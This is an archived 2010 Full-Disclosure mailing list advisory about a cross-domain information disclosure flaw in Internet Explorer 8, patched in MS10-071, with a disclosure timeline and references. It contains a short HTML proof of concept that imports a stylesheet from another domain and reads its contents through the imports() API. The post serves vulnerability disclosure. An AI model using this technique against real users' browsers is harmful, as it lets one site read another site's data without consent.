lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <AANLkTinJeMvx+QVYwV-OXhCqCp9wFzwOKtNXyNwRZPw=@mail.gmail.com>
Date: Thu, 14 Oct 2010 22:27:03 +0800
From: IEhrepus <5up3rh3i@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: IE8 Css Cross-Domain Information Disclosure
	Vulnerability

IE8 Css Cross-Domain Information Disclosure Vulnerability

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2010/10/14
References: http://www.80vul.com/ie8/IE8%20Css%20Cross-Domain%20Information%20Disclosure%20Vulnerability.txt

Overview:

MS-071 have fixed a  Cross-Domain Information Disclosure Vulnerability
by CSS imports() on IE8, this vul look like had fixed on 2005 by
hacker.co.il[1],but when it work well on IE8 .

POC[2]:

<html>
<head>
<style>
@import url("http://hi.baidu.com/hi_heige");
</style>
<script>
function loaded() {
  alert(document.styleSheets(0).imports(0).cssText);
}
</script>
</head>
<body onload="loaded()">
</body>
</html>

Disclosure Timeline:

2010/09/09 - Found this Vulnerability
2010/10/12 - Microsoft Security Bulletin MS10-071 Published
2010/10/14 - Public Disclosure

References:
[1] http://www.hacker.co.il/security/ie/css_import.html
[2] http://80vul.com/cssinj/ms071.html

-- 
hitest

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ